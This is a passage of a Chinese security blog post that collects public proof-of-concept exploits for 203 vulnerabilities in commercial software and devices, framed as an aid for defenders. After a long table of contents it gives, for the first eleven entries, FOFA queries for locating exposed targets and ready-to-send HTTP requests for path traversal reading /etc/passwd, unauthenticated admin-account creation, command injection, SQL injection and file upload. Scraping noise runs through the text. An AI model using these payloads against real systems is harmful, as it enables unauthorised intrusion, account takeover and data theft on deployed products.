互联网公开漏洞整理202309-202406
- W6 m& t" H% q2 p道一安全 2024-06-05 07:41 北京* J8 \! P$ {# E3 J+ `! Z* l7 S
以下文章来源于网络安全新视界 ,作者网络安全新视界
1 Y7 V$ z v) w! B. {7 _! D# i
L2 |/ k. i8 {0 K( m# h发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。
& F1 z' Q( o" d( S
. i5 z$ c6 m) g4 j# ^$ I漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。
/ c$ t0 r, e8 L% r& u% K* U- N3 q0 d; b
安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。/ ?# x/ q. a1 u* T
7 I; q# a5 g. d$ M! e+ v) y
文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。
- e8 i+ S9 q: q5 n) w) z& F
, s6 L/ Z( Q5 t$ `4 [7 Z# b合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。
" } k! D0 j# A( Y5 I6 P! ?7 ]+ r& L* C" X: o B+ ]
5 D% ] N, f& p5 U7 x7 `% o# G6 D
声明
3 E, }1 U4 i3 c v- h
7 m2 ^4 t0 A! N: l; k为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。
! u) b& i" q8 L
$ N. J9 ~9 b' z, u3 N8 M/ X3 ^有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。
% X1 X3 K+ C5 Z0 J; v/ \
) I: v9 ]2 f3 E! T5 I |& [: R6 U0 i) x1 v% j3 [
8 p# w% m0 v. L8 V% ]
目录' Q1 o$ k C8 Q1 ^+ \. R: f
4 ^: {7 ]8 P# ? F
013 e0 b- H. J0 B& j
4 x4 W: F4 w) a3 F+ G/ J( P' R6 F1. StarRocks MPP数据库未授权访问
- K" Y/ O* D0 |; ~9 n( p) Q2. Casdoor系统static任意文件读取
, m) j/ Z5 O0 O% V/ y7 w$ m+ k3. EasyCVR智能边缘网关 userlist 信息泄漏
. X- ^5 @6 g" ^3 l/ @: t5 ?4. EasyCVR视频管理平台存在任意用户添加
( {: N$ ]# H C6 r4 A8 z# z; U5. NUUO NVR 视频存储管理设备远程命令执行; `2 v9 M( Y# Y9 M. @
6. 深信服 NGAF 任意文件读取
$ T' u8 N: S- ]& i7 R7. 鸿运主动安全监控云平台任意文件下载8 M" @- v D2 k1 b
8. 斐讯 Phicomm 路由器RCE( F& c1 Y& b: Y/ l! G% {
9. 稻壳CMS keyword 未授权SQL注入+ l. E2 B% v' A# r/ b. \& |
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传& n+ e) r% Z; z: |/ B* Q/ T7 S
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入) q: b# M( @' V
12. Jorani < 1.0.2 远程命令执行5 Z- k7 {; z) o
13. 红帆iOffice ioFileDown任意文件读取
+ T: @# \+ l9 R {4 L2 k5 k7 C14. 华夏ERP(jshERP)敏感信息泄露/ [: Z' c, M4 E) W. N" w; p
15. 华夏ERP getAllList信息泄露, F v6 P9 R$ h
16. 红帆HFOffice医微云SQL注入* i# }! O; o0 ~+ B4 a: C
17. 大华 DSS itcBulletin SQL 注入! k. X% J* k8 j( g; g
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
1 X$ m+ b: L) t- D19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
9 l3 Y% D7 o; x* v% Y20. 大华ICC智能物联综合管理平台任意文件读取
3 L- f& h" ~6 h! x21. 大华ICC智能物联综合管理平台random远程代码执行
- j' g( M: h. I: R2 B% W22. 大华ICC智能物联综合管理平台 log4j远程代码执行
& C6 `- _ z( q# L& M, t3 O/ F23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
1 h% ^: |: G6 j3 g1 c24. 用友NC 6.5 accept.jsp任意文件上传
) G- ~' e& R$ a0 q25. 用友NC registerServlet JNDI 远程代码执行$ j9 M. i3 T7 C, ~ E7 e
26. 用友NC linkVoucher SQL注入
7 q& V7 X& B3 |3 M L. m# S27. 用友 NC showcontent SQL注入4 Z, j& T/ j! t, W& K( u
28. 用友NC grouptemplet 任意文件上传5 D7 R" I+ P9 l/ ^# q
29. 用友NC down/bill SQL注入9 b1 @% l3 P: D2 z
30. 用友NC importPml SQL注入) d! g+ X0 R- M# _( ~ X
31. 用友NC runStateServlet SQL注入5 I* K( A# A1 }' ?5 z
32. 用友NC complainbilldetail SQL注入$ J6 i, s$ ]" D' s
33. 用友NC downTax/download SQL注入
- O" N* |5 j- ?: n34. 用友NC warningDetailInfo接口SQL注入* `7 Z1 D4 p Z3 d) r
35. 用友NC-Cloud importhttpscer任意文件上传' Q+ I* }; K; T/ {: q
36. 用友NC-Cloud soapFormat XXE
L! y" m- b8 o4 A3 I37. 用友NC-Cloud IUpdateService XXE
# u( P8 g* {- |5 h0 r8 S9 {# o, z* n38. 用友U8 Cloud smartweb2.RPC.d XXE
9 K$ j# Q# H! I' y39. 用友U8 Cloud RegisterServlet SQL注入4 E7 n& ]' `; X' u
40. 用友U8-Cloud XChangeServlet XXE0 @ m3 Z7 V2 O J( t7 S3 `
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
4 T- A5 o) S$ P; n42. 用友GRP-U8 SmartUpload01 文件上传' u1 u& t$ F& k- I/ D
43. 用友GRP-U8 userInfoWeb SQL注入致RCE
% s. h& y% j) K44. 用友GRP-U8 bx_dj_check.jsp SQL注入1 |2 E5 e! ]. j8 B* d2 w
45. 用友GRP-U8 ufgovbank XXE
# L4 D, { F0 S( E0 K46. 用友GRP-U8 sqcxIndex.jsp SQL注入
0 a4 D5 q- c& L/ N' s47. 用友GRP A++Cloud 政府财务云 任意文件读取
5 }9 }( e. y5 H* K' p48. 用友U8 CRM swfupload 任意文件上传
2 p8 F4 |( q. y. Z( O t49. 用友U8 CRM系统uploadfile.php接口任意文件上传! S" K' e+ d- t- T
50. QDocs Smart School 6.4.1 filterRecords SQL注入1 h$ [8 S8 x4 _( A; E" a' r# q
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
* S# j* {' Y2 z' k4 S6 Q) c; A% W52. 泛微E-Office json_common.php sql注入
: D) q4 L; }- m% w7 j& r* ~5 H53. 迪普 DPTech VPN Service 任意文件上传
0 r. x. }9 X( _5 M& g3 G54. 畅捷通T+ getstorewarehousebystore 远程代码执行
- a7 [' O" W6 C, C+ w Y55. 畅捷通T+ getdecallusers信息泄露0 g$ i& a% Z" R: w- E9 ~ Y
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
3 c( \, m! F9 t! ^3 ?57. 畅捷通T+ keyEdit.aspx SQL注入$ }: O3 E' J4 K# M }- M' v3 D
58. 畅捷通T+ KeyInfoList.aspx sql注入
$ p0 i- |4 U7 Q. v3 m) ?59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
. a, R+ ]% k, Z, v; N; r3 ]60. 百卓Smart管理平台 importexport.php SQL注入; P4 Q5 n( _! _4 d) E7 V- L
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传/ Q) | E ?$ V: j3 Q8 U
62. IP-guard WebServer 远程命令执行
' a g! X9 L3 j; m8 C" K/ J" p4 M63. IP-guard WebServer任意文件读取7 M M2 j+ `2 V0 l6 N& z
64. 捷诚管理信息系统CWSFinanceCommon SQL注入. ?$ h W2 P) h; k5 G
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
* \' Z0 _4 m, S0 h; {3 w66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入1 C! f& q4 A1 c8 A( M. z
67. 万户ezOFFICE wpsservlet任意文件上传
4 q, f& r$ \9 K2 t68. 万户ezOFFICE wf_printnum.jsp SQL注入
3 k+ a6 D4 f: d$ k6 j69. 万户 ezOFFICE contract_gd.jsp SQL注入
( u2 @& \" B, B70. 万户ezEIP success 命令执行' V. c6 H- W( K7 u" U+ ~
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入" j1 ~4 Y8 D& z3 V
72. 致远OA getAjaxDataServlet XXE f' q" K$ J V% m
73. GeoServer wms远程代码执行
: m' y1 @$ Q) P$ w3 X5 h1 d74. 致远M3-server 6_1sp1 反序列化RCE
) A2 E9 H7 ?. p! S- _) H. O2 x75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE, I1 N+ S" c8 T6 P2 U
76. 新开普掌上校园服务管理平台service.action远程命令执行
9 h6 Y( f8 p- n8 S! A8 s77. F22服装管理软件系统UploadHandler.ashx任意文件上传: N" I, i+ Z! @1 Z9 E0 i7 A6 r
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
+ S, l# S! E( G! z79. BYTEVALUE 百为流控路由器远程命令执行
! H, l- a( h5 G; x80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传; U: X+ O3 _; X/ K9 y# D3 u
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露7 m4 P5 p2 ]( ? X$ x" _
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
5 A# W8 C6 t( H) g9 K4 [3 g83. JeecgBoot testConnection 远程命令执行. O4 R/ g T4 Q4 V
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入3 f& v" l# |% h; m& G
85. SysAid On-premise< 23.3.36远程代码执行' i, I, Z; }. F0 I$ g7 @- }
86. 日本tosei自助洗衣机RCE9 L3 U- Z, U# |1 E( E/ f
87. 安恒明御安全网关aaa_local_web_preview文件上传0 J3 D2 T1 O7 i* i8 H
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
6 ^/ [- a% m, i* g6 |89. 致远互联FE协作办公平台editflow_manager存在sql注入
, G, ~% [- l3 }- U; d90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行3 t2 F4 z% |2 r7 e& `3 ^ {& Q
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
9 _/ t* O7 f( t8 V# C92. 海康威视运行管理中心session命令执行
) V- p% }5 G- A: f93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
( B( H7 }5 f, u0 Z94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
7 J/ V3 B! w# f( z7 L4 B) q95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
) s+ t% u3 b: R9 Y$ d5 n% c96. Apache OFBiz 18.12.11 groovy 远程代码执行' W4 v- i3 ~* S& f
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行0 N$ i. b) P' w1 L7 a
98. SpiderFlow爬虫平台远程命令执行
7 V! I" ?9 ?+ ]( F99. Ncast盈可视高清智能录播系统busiFacade RCE
u0 K3 X! B0 W! u+ G; w100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传5 i w1 V& J* [
101. ivanti policy secure-22.6命令注入1 V3 P, v; s _
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
7 J9 e! ]! P9 ^103. Ivanti Pulse Connect Secure VPN XXE
& \: a; e2 N& R* i" d104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
& ?7 Y d' y) J1 [3 n( f105. SpringBlade v3.2.0 export-user SQL 注入
; C# u, o' Z p8 k106. SpringBlade dict-biz/list SQL 注入+ [' O" @- U! n: u3 a
107. SpringBlade tenant/list SQL 注入
# S0 [# x/ X# a! S( {108. D-Tale 3.9.0 SSRF3 M9 k' |+ }& j& J) l
109. Jenkins CLI 任意文件读取
/ c4 m2 R4 _$ ?110. Goanywhere MFT 未授权创建管理员
" L9 J( a: e K, D111. WordPress Plugin HTML5 Video Player SQL注入, x3 R' R( `: q! B; e2 f0 \# p- k
112. WordPress Plugin NotificationX SQL 注入
# g7 _) U9 D7 C113. WordPress Automatic 插件任意文件下载和SSRF' X3 s4 O, b9 m0 R2 [0 o2 j# v1 V
114. WordPress MasterStudy LMS插件 SQL注入
) y# g, G) W' `9 g9 K( Y; Z7 b115. WordPress Bricks Builder <= 1.9.6 RCE7 D5 S5 [6 m# F' \
116. wordpress js-support-ticket文件上传
6 |4 b& s: @* u8 T& T117. WordPress LayerSlider插件SQL注入0 t% w( R3 \" r4 Z+ Z7 g
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
0 \2 l6 y/ ^, {7 R8 z119. 北京百绰智能S20后台sysmanageajax.php sql注入 F8 {$ J; X1 F5 O1 J$ V
120. 北京百绰智能S40管理平台导入web.php任意文件上传
7 z7 N8 q0 J3 d. B6 ~/ m121. 北京百绰智能S42管理平台userattestation.php任意文件上传 w' X1 ?+ ?0 ~
122. 北京百绰智能s200管理平台/importexport.php sql注入6 C% I2 A# D4 {3 R! n
123. Atlassian Confluence 模板注入代码执行. \( D" o( n1 F; r# f' d- d7 E6 ^
124. 湖南建研工程质量检测系统任意文件上传
3 }1 Q7 Y- s0 p+ v+ f5 p* m125. ConnectWise ScreenConnect身份验证绕过
- |: f; F8 K8 a! I( k* | T126. Aiohttp 路径遍历/ e/ E. n6 h: L! t7 q. |
127. 广联达Linkworks DataExchange.ashx XXE4 X" ^& }) X# l; G! y
128. Adobe ColdFusion 反序列化
$ d' h/ o( B& p& h129. Adobe ColdFusion 任意文件读取3 n; H$ d( v1 h" {4 l9 t% K- p* h
130. Laykefu客服系统任意文件上传8 g8 z* @, `# k( e6 D6 E2 a* Y9 V
131. Mini-Tmall <=20231017 SQL注入0 l+ Z0 k- d/ s0 m- U6 ^
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过3 K( @/ D% b/ l+ u7 b3 w
133. H5 云商城 file.php 文件上传4 C5 a; }2 K; Q+ c
134. 网康NS-ASG应用安全网关index.php sql注入& _. e/ h4 ?7 B. `
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
0 D& q0 Q2 Z$ R4 {2 D$ [* F136. NextChat cors SSRF/ g, a4 u/ `: ?6 X
137. 福建科立迅通信指挥调度平台down_file.php sql注入. h' _8 C( ], _
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入9 M% C) E$ x9 t1 \3 G) H: o! R |5 c
139. 福建科立讯通信指挥调度平台editemedia.php sql注入* H' R# \' W5 |2 N6 \& ?- M
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
) `$ Y3 Z7 `$ H- m141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
5 s9 b& |, ?1 F) {4 l9 t3 K142. CMSV6车辆监控平台系统中存在弱密码+ X$ I0 h& e7 p- G% k& W$ }7 t
143. Netis WF2780 v2.1.40144 远程命令执行" m6 P& i# E8 O! b
144. D-Link nas_sharing.cgi 命令注入
" ~+ p% f* ?% [+ |' T# Y( K145. Palo Alto Networks PAN-OS GlobalProtect 命令注入/ t. h% w K" ~
146. MajorDoMo thumb.php 未授权远程代码执行
9 y0 A: H' i: m; d147. RaidenMAILD邮件服务器v.4.9.4-路径遍历: U) ]% _' h$ k
148. CrushFTP 认证绕过模板注入
5 }& d) H3 j! L- _6 u S# w149. AJ-Report开源数据大屏存在远程命令执行( o* p, f' k. u: k: `) O$ T
150. AJ-Report 1.4.0 认证绕过与远程代码执行
! R" p+ S9 a% ~- q) f3 k! [ j1 q5 L151. AJ-Report 1.4.1 pageList sql注入0 ? ]) o. z+ H( N
152. Progress Kemp LoadMaster 远程命令执行
. V! H: B9 k: t, M' h2 |" P/ K0 B153. gradio任意文件读取, o. ]- l7 w% K, Q7 C
154. 天维尔消防救援作战调度平台 SQL注入& I. P$ Z4 O- i2 v* K
155. 六零导航页 file.php 任意文件上传
% C7 d9 _# X1 x" [1 q% {& v4 q/ Z156. TBK DVR-4104/DVR-4216 操作系统命令注入
" l/ U4 `/ O1 h: e157. 美特CRM upload.jsp 任意文件上传
9 i4 t2 J% U2 G+ ]' j+ k* w8 i0 @; E158. Mura-CMS-processAsyncObject存在SQL注入7 v6 W. T/ I! d3 ?6 E1 T
159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传
9 I) n0 f( _1 J$ u- f& o5 A8 {160. Sonatype Nexus Repository 3目录遍历与文件读取% ?( Y% L5 N6 a' \6 k
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
) A2 B) j) L3 }: O) t! J! l' P162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传4 h2 G2 O& c+ W) d1 J- h% {; h6 A
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传: N* Y4 [ m& W% a
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传3 m' X* \9 m6 @+ G# V5 V: h) k
165. OrangeHRM 3.3.3 SQL 注入
' l) P5 `5 \$ o2 v' K+ y' n+ T+ ?( W166. 中成科信票务管理平台SeatMapHandler SQL注入
3 A% t' q0 f. p+ Q" Q- C' j167. 精益价值管理系统 DownLoad.aspx任意文件读取8 I3 V, R( r! D' h( a& o% R
168. 宏景EHR OutputCode 任意文件读取
. d2 @, W) `) c# _' w169. 宏景EHR downlawbase SQL注入
$ B: S; T- `8 V F/ N170. 宏景EHR DisplayExcelCustomReport 任意文件读取
! ^8 h6 o h2 A7 ?4 O171. 通天星CMSV6车载定位监控平台 SQL注入
/ J: ^7 T( ~$ H5 s( v& [172. DT-高清车牌识别摄像机任意文件读取
% S3 P4 F+ U2 B7 q173. Check Point 安全网关任意文件读取/ _8 q* I0 _$ x
174. 金和OA C6 FileDownLoad.aspx 任意文件读取
d: H* k# o+ \" c1 C' p, E175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入5 E( r% _+ T$ I! x- u
176. 电信网关配置管理系统 rewrite.php 文件上传5 s5 j! _8 x+ z% Q4 ~1 J, ~. O
177. H3C路由器敏感信息泄露
5 M, E& [) o/ o4 n+ S0 e6 h" b178. H3C校园网自助服务系统-flexfileupload-任意文件上传
4 z# n) h, X& a6 {" u2 M+ i179. 建文工程管理系统存在任意文件读取
) _( r) ? i8 `+ a8 [" f& \180. 帮管客 CRM jiliyu SQL注入
* s" U6 P- Z) a( R2 u181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
1 |8 L- N9 z8 j' Q182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
+ m3 p9 ^& o" D) v. o183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入4 ~2 ~) J& N+ c0 c: [
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加1 q! P X; k W$ F
185. 瑞友天翼应用虚拟化系统SQL注入9 d! m5 d! C% Q, I& r' K! n
186. F-logic DataCube3 SQL注入4 U; P3 l, |9 q9 Z4 _
187. Mura CMS processAsyncObject SQL注入
' X$ D/ k- I( r) @4 g% \6 H9 J188. 叁体-佳会视频会议 attachment 任意文件读取
7 r' i+ l# N8 G# w- r189. 蓝网科技临床浏览系统 deleteStudy SQL注入
3 O# h: u" f H) c$ E190. 短视频矩阵营销系统 poihuoqu 任意文件读取" D9 R9 K) [& Y
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
$ E0 L% B7 c& j2 }% c192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
8 o& Y3 q, D& U7 s5 N193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
8 _9 q$ Z) |0 H9 N0 ?194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
0 n o/ }* q+ K0 e5 l* n195. 飞鱼星上网行为管理系统 send_order.cgi命令执行: L" U" v- M2 v
196. 河南省风速科技统一认证平台密码重置+ S0 v- ?5 K0 K% e2 k
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入: z, s: K* y+ j( W# q% P( v
198. 阿里云盘 WebDAV 命令注入
( h2 T; X9 W, q8 i5 r199. cockpit系统assetsmanager_upload接口 文件上传
3 l, |: Z: g( B200. SeaCMS海洋影视管理系统dmku SQL注入& s. ~) K$ E6 R D/ ^. f5 d
201. 方正全媒体新闻采编系统 binary SQL注入
- P$ C# Z3 n8 l8 @2 n. I' [% s- J202. 微擎系统 AccountEdit任意文件上传% @9 U" Q1 n+ f0 y8 d
203. 红海云EHR PtFjk 文件上传
- q' y& A: G; J4 ]) D, j* `( t4 N; `7 F9 f( f! \0 K5 \
POC列表
3 G. F% Q$ X: g" k& x2 G8 E2 v4 W" C. B% \( j! C8 B5 l# y
02
7 J) e; S2 H# M5 [3 R8 W, i/ }7 R9 t$ Y% T4 t
1. StarRocks MPP数据库未授权访问
; y: ]- K+ u7 P' u, k* B6 [FOFA :title="StarRocks"1 W! Y/ Z3 g# K+ P- b
GET /mem_tracker HTTP/1.1
# r& Y& \7 G8 ~% E% D: fHost: URL
1 {. J2 q4 A3 V" x+ E7 L& L: y A5 n7 y) k8 [
" C3 a: Q$ V! B- V4 U, x! j
2. Casdoor系统static任意文件读取: q( ^, r0 H9 U' N
FOFA :title="Casdoor"
& G! }9 W3 z- O' V7 MGET /static/../../../../../../../../../../../etc/passwd HTTP/1.10 @0 K ]/ Q3 N Z: A2 H
Host: xx.xx.xx.xx:9999( p# U- z- u& j% g; a% C' _ M
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
5 b" H: w$ r: a1 c( a! f5 RConnection: close0 r5 R# e5 ^+ t7 R9 z! ^9 Q
Accept: */*
) m, w; m% t2 l( i K: c! ZAccept-Language: en
: ~- P6 F; a# J$ X- d6 LAccept-Encoding: gzip$ V/ i; S* ]: M
, b7 H0 a# h }6 s1 k! g
5 n' @! F! e, N2 X# Z% S5 |3. EasyCVR智能边缘网关 userlist 信息泄漏 ?( L9 _- R0 E! m
FOFA :title="EasyCVR"
3 p8 Y }- b. D9 M) pGET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1$ ~3 q- o1 `' S% d y; U
Host: xx.xx.xx.xx9 `$ p6 r9 V% A. I
7 l5 n. \" E+ l) y3 g5 y R/ U( X6 D. N. b1 A$ {
4. EasyCVR视频管理平台存在任意用户添加$ b- q; ]1 h) Z2 V
FOFA :title="EasyCVR"4 O, z6 H5 n: {4 Q
6 k) v) ~$ O( y' _
password更改为自己的密码md5
/ E: `0 k5 ]" F" G2 u3 cPOST /api/v1/adduser HTTP/1.1# s$ U p% y; p$ E
Host: your-ip0 }( H0 P$ `1 k% ^
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
# Q* n6 M7 k, [. a' K9 S8 u
# B3 [- R8 J$ D/ q( b- e. W4 b% Qname=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1 D! G! b& H. c* V+ W6 h E I9 N
7 q8 P5 J! z4 R; {( m! W
0 V; W ?: ^( X
5. NUUO NVR 视频存储管理设备远程命令执行/ v" J# K% G" S/ e( b4 t6 F t
FOFA:title="Network Video Recorder Login"
; [( p) G$ Z PGET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
; S4 m& `* ]% E2 K' O- W! Y/ P1 {- eHost: xx.xx.xx.xx
2 G# D" i# g3 V7 ~- ]0 t, T1 ~( s0 P+ g
0 ?( n% {8 K. i+ a# J' |
6. 深信服 NGAF 任意文件读取
0 h# [* _' V. MFOFA:title="SANGFOR | NGAF"! s7 k+ y# @! P1 s8 X& C/ |8 _
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
$ i, a" v' d. L2 @& OHost:
1 o% a% h7 o. ^3 g
1 e* e- o" {1 B a6 n% N" g( j3 v
7. 鸿运主动安全监控云平台任意文件下载
% |) n- v6 w7 s# I) ^) WFOFA:body="./open/webApi.html"
5 V' ] L: Y8 b* h, F/ W/ VGET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.13 |1 ~+ _ o8 O: [5 W8 T! y
Host:
% ^( N e& G! h
6 O' k6 s, u7 h A# N5 v3 t G- g6 q& n x9 z
8. 斐讯 Phicomm 路由器RCE
1 {* C6 w& e2 d: u- H" kFOFA:icon_hash="-1344736688"; o0 J6 K+ \6 @+ g
默认账号admin登录后台后,执行操作& T+ R2 P% _! s) U* J3 U
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
, ]' I( P* u( G0 n" R& sHost: x.x.x.x
7 O+ J; I- z, z* V3 G: [9 b, x6 wCookie: sysauth=第一步登录获取的cookie* h/ f/ I- e- d, D! A( |* e
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
- a4 W5 s" I& x6 {, C; e, J! JUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.366 z; d' B6 Z! b% k* s6 H m
1 N/ {3 Q0 c8 z, K) W
------WebKitFormBoundaryxbgjoytz( S# q7 b1 N- G
Content-Disposition: form-data; name="wifiRebootEnablestatus"
' L) i9 d( s% n% _9 N) A- ~+ L$ _% h7 \) g& H2 k$ ?$ i" R
%s
0 L# T1 z' ?1 Q% v, [------WebKitFormBoundaryxbgjoytz7 t7 R3 S3 d% w2 A: ?9 j: ]
Content-Disposition: form-data; name="wifiRebootrange"
+ s9 p5 @- f% o& ~& \
( b5 Q; v( x+ i1 t9 Y9 ~( U- t& y12:00; id;& @% Q% I2 q1 @* ?/ a5 r) P
------WebKitFormBoundaryxbgjoytz9 i. i- y6 c+ |8 r3 c& N. ~# \5 \
Content-Disposition: form-data; name="wifiRebootendrange"
, V+ G% v- r w( F; z4 }. F- a* q$ s. r! a- v; w( Y" N
%s:
* Q9 V* W' d, ~& F" J------WebKitFormBoundaryxbgjoytz
1 P4 J4 v; D6 D! e" {6 @; L# wContent-Disposition: form-data; name="cururl2"
5 U2 F6 H& C& t# \/ P
$ I' U9 t9 q6 R$ H. [
4 a$ v: I6 e0 @------WebKitFormBoundaryxbgjoytz--) M* r* N& u% N
4 [0 z4 [; B# A7 P9 {) s1 X8 N7 Z& O/ Z1 D, \- O
9. 稻壳CMS keyword 未授权SQL注入4 K( L9 j' I, M! N6 Y
FOFA:app="Doccms"
$ m3 Q, a( z4 X9 q) _. uGET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
( q$ h+ u5 B, {: v, X# p3 w6 ~Host: x.x.x.x
: _, `- r' U- @$ e' |# O
. M: Z( u3 ~) }- C; ~- Z& Q/ m, j1 Z: H& _- N
payload为下列语句的二次Url编码8 s7 `( c0 D# ?1 v
4 W, A+ F& K: w/ h2 ?' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#2 F& S4 j8 F3 c0 e& i
0 k7 w$ l ~ ^- L. a4 E: `10. 蓝凌EIS智慧协同平台api.aspx任意文件上传: \8 t' E' g4 f4 R& i' {
FOFA:icon_hash="953405444"+ U4 t7 m' T- r" S% x1 A& h
L* c7 w6 @. c9 K4 G0 [9 P5 f3 A
文件上传后响应中包含上传文件的路径" C5 c' _* @" x8 z( ^2 t3 [
POST /eis/service/api.aspx?action=saveImg HTTP/1.1/ o. I) L+ Q1 L" d& U6 G! B) p `
Host: x.x.x.x:xx
; G, H# s T8 \User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
! h. s% Z/ L1 W$ TContent-Length: 197
2 Q5 v3 R. r3 SAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9) s( ?5 O4 v; e6 z- R& G8 a7 }. k- h
Accept-Encoding: gzip, deflate
! h: F! M; f \% D' K% `Accept-Language: zh-CN,zh;q=0.91 ~7 l, t# [0 V% f
Connection: close
2 M7 |) ` g7 a3 d8 t, @* CContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu4 l' z# f2 q: M! Z C' x( E
) B# o+ P% @; b1 Y------WebKitFormBoundaryxdgaqmqu
) a. a* R- ]* I! i3 W' G$ vContent-Disposition: form-data; name="file"filename="icfitnya.txt"
7 b4 |1 i, e1 E$ A. M6 {Content-Type: text/html* E% R; ?# U: Q5 s
5 ~8 e* d- U7 u3 Y* M: Gjmnqjfdsupxgfidopeixbgsxbf/ p6 \/ o, @0 l
------WebKitFormBoundaryxdgaqmqu--
/ ]9 o$ j) Y% n8 w2 _& G" t9 k2 C- T7 r9 `
: w* [0 T' t! i5 f# i11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
* G, l7 y" z+ QFOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"
2 j) I+ \6 h" s) b! jGET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.16 k W3 r! R- @
Host: 127.0.0.1
. \- c+ k5 C( f, p; rPragma: no-cache% h$ H/ V/ I* T; O4 a* D
Cache-Control: no-cache
) k( i) b) J/ N5 |; M$ x; dUpgrade-Insecure-Requests: 1
